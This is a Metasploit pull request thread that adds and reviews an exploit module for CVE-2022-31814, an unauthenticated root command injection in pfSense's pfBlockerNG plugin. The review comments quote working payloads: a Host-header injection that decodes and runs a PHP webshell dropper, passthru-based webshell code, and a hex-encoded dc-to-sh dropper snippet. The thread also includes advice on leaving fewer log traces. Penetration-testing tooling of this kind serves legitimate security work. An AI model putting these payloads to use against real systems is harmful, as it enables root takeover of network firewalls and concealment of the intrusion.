Add module for pfSense pfBlockNG unauth RCE as root
rapid7/metasploit-framework pull request #17032
Opened 2022-09-17 18:58 UTC by jheysel-r7

This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header.
Versions =< 2.1.4_26 are vulnerable, note that version 3.X is unaffected.

I wasn't able to identify why the name of the webshell can only be a certain length, but I've added a guard to ensure it will always be a length that will allow the webshell to be uploaded to a vulnerable target. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Do: `use unix/http/pfsense_pfblockerng_webshell`
- [ ] Set the RHOST, LHOST options
- [ ] Run the module
- [ ] Receive a cmd shell as the root user

2022-09-18 10:06 UTC, EvergreenCartoons commented
I can't seem to send a PR to the PR to add to the notes, so whatever, I'll add them in this comment (along with the other comment above).

For IoC's in Logs, I did a look about, and found the exploitation creates log entries in the following places:

```
logs of webshell access and any commands sent will be in /var/log/nginx.log
logs of requests to the vulnerable endpoint will be in /var/log/nginx.log
the whole webshell injection command will be in /var/log/pfblockerng/dnsbl.log
```

For less-logs, using a POST request to send the commands to the webshell is far superior, that way you don't end up with commandstager crap spewed into the nginx access log, so there is significantly less mess to clean up.

2022-09-20 16:04 UTC, jacob-baines commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
Instead of `python3.8 -m base64 -d`, I'd suggest `openssl base64 -d`. My main concern being the versioned python binary. Although, if pfsense never changes it then 🤷🏼 

Great module @jheysel-r7! <3

2022-09-20 16:09 UTC, jvoisin commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      <?$a=fopen("/usr/local/www/#{@webshell_name}","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>
Also, why not use `getmyuid()`/`get_current_user()`/`posix_getuid()`/… directly?

2022-09-20 16:09 UTC, jvoisin commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
`base64 -d` is even shorter :)

2022-09-20 16:15 UTC, jacob-baines commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
Too bad pfSense doesn't have `base64 -d` ;)

2022-09-20 16:17 UTC, jvoisin commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
Arg.

2022-09-21 12:42 UTC, EvergreenCartoons commented
Just another FYI: You can replace the base64 entirely with hex using `dc` to decode it.

A worked example as part of my implementation of this exploit is here: https://github.com/EvergreenCartoons/SenselessViolence/issues/7

2022-09-21 21:15 UTC, jheysel-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      <?$a=fopen("/usr/local/www/#{@webshell_name}","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>
Thanks @jvoisin, these are all great. I've made these changes and retested

2022-09-21 21:15 UTC, jheysel-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
Thanks all!! 🙇

2022-09-21 21:16 UTC, jheysel-r7 commented
> Just another FYI: You can replace the base64 entirely with hex using `dc` to decode it.
> 
> A worked example as part of my implementation of this exploit is here: [EvergreenCartoons/SenselessViolence#7](https://github.com/EvergreenCartoons/SenselessViolence/issues/7)
> 
> This also avoids weird bad-char issues to do with forward slashes in base64, allowing for much greater freedom in payload selection.

Sweet, this is great! Thanks for linking

2022-09-22 12:07 UTC, jvoisin commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      <?$a=fopen("/usr/local/www/#{@webshell_name}","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>
Absolutely, since you're checking the return of a `getuid` function to see if the target is vulnerable.

2022-09-22 12:30 UTC, EvergreenCartoons commented
Further payload optimising: yes, we can go *smaller*, replace the PHP dropper with a simple shell dropper.

Also worth noting - with the hex encoding there is no restriction that I have found on the length of the webshell name, and I've tested it pretty extensively so far.

I've yet to commit the latest changes to my implementation, but it works.

Code snippet below:

```
    shell_fullpath = "/path/to/webshell.php"
    shell_code = "<?php eval($_[1]);"
    php_code = f"echo '{shell_code}' > {shell_fullpath}"
    encoded_php = binascii.hexlify(php_code.encode('ascii'))
    encoded_php = encoded_php.upper()
    print(encoded_php)
    command_string = f"' *; echo '16i {encoded_php.decode('ascii')} P' | dc | sh; '"
```

2022-09-22 14:11 UTC, bwatters-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +    fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched ') if check_for_shell.nil? || check_for_shell.body.nil?
```suggestion
    fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched.') if check_for_shell.nil? || check_for_shell.body.nil?
```

2022-09-22 14:11 UTC, bwatters-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched')
```suggestion
      fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched.')
```

2022-09-22 14:11 UTC, bwatters-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha([5, 8, 11, 14, 17].sample)}.php"
You may want to check that the user followed instructions here and verify the name or only let the generated name be used.

2022-09-22 14:12 UTC, bwatters-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +
Can we add a check to see if the patch is installed?

2022-09-26 21:19 UTC, jheysel-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha([5, 8, 11, 14, 17].sample)}.php"
After implementing improvements suggested above, we no longer have restricts on the webshell name length 🎉

2022-09-26 21:59 UTC, jheysel-r7 commented
> Further payload optimising: yes, we can go _smaller_, replace the PHP dropper with a simple shell dropper.
> 
> Also worth noting - with the hex encoding there is no restriction that I have found on the length of the webshell name, and I've tested it pretty extensively so far.
> 
> I've yet to commit the latest changes to my implementation, but it works.
> 
> Code snippet (python3) below:
> 
> ```
>     shell_fullpath = "/path/to/webshell.php"
>     shell_code = "<?php eval($_POST[1]);"
>     php_code = f"echo '{shell_code}' > {shell_fullpath}"
>     encoded_php = binascii.hexlify(php_code.encode('ascii'))
>     encoded_php = encoded_php.upper()
>     print(encoded_php)
>     command_string = f"' *; echo '16i {encoded_php.decode('ascii')} P' | dc | sh; '"
> ```


Thanks for the suggestion @EvergreenCartoons, much appreciated. I tried implementing this but wasn't able to get code execution. I tried to follow what you suggested:

Updated the shell code to run the `eval` command and then also updated the end of the command string ( in my case the host header) `P' | dc | sh; '` to execute shell code instead of php code. 

Do you know if I'll have to update how I'm sending the command in `vars_post` for this to work? Any further suggestions would be appreciated, thanks!

2022-09-26 22:10 UTC, jvoisin approved these changes

2022-09-26 22:10 UTC, jvoisin commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php print(passthru( $_POST["c"]));');
`'<?php print(passthru( $_POST["c"]));'` → `'<?php echo(passthru($_POST["c"]));'` is even shorter!

2022-09-28 18:55 UTC, jheysel-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php print(passthru( $_POST["c"]));');
Updated, thanks @jvoisin!

2022-09-29 12:12 UTC, jvoisin approved these changes

2022-10-12 23:49 UTC, gwillcox-r7 requested changes

2022-10-12 23:49 UTC, gwillcox-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +                'Append' => ' & disown'
This isn't a valid command in my install so I think it might be safe to remove this given our earlier discussion. Further to our slack convo I don't think this is needed given improvements by contributors.

2022-10-12 23:49 UTC, gwillcox-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
Do we not want to append `.php` to the end here for the web shell name or is this okay? People might forget this is a PHP file type without reading the code.

2022-10-12 23:49 UTC, gwillcox-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["c"]));');
I'm fairly certain this `c` parameter could be randomized with a little bit of code, otherwise its fairly easily detected. Not a major issue though.

2022-10-12 23:49 UTC, gwillcox-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +    sleep datastore['WfsDelay']
Is this needed?

2022-10-12 23:49 UTC, gwillcox-r7 commented on modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
> +    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_for_shell.nil? || check_for_shell.body.nil? || !check_for_shell.body.include?('uid=0(root) gid=0(w
`check_for_shell` is a poor variable name for what it holds here and tells me nothing about the data type or its contents. Should probably update this.

2022-10-13 02:27 UTC, gwillcox-r7 approved these changes

2022-10-13 02:29 UTC, merged

2022-10-13 13:59 UTC, gwillcox-r7 commented
# Release Notes
A module has been added for CVE-2022-31814, an unauthenticated RCE in the pfSense plugin within pfBlockerNG that allows remote unauthenticated attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. Versions =< 2.1.4_26 are vulnerable. Note that version 3.X is unaffected.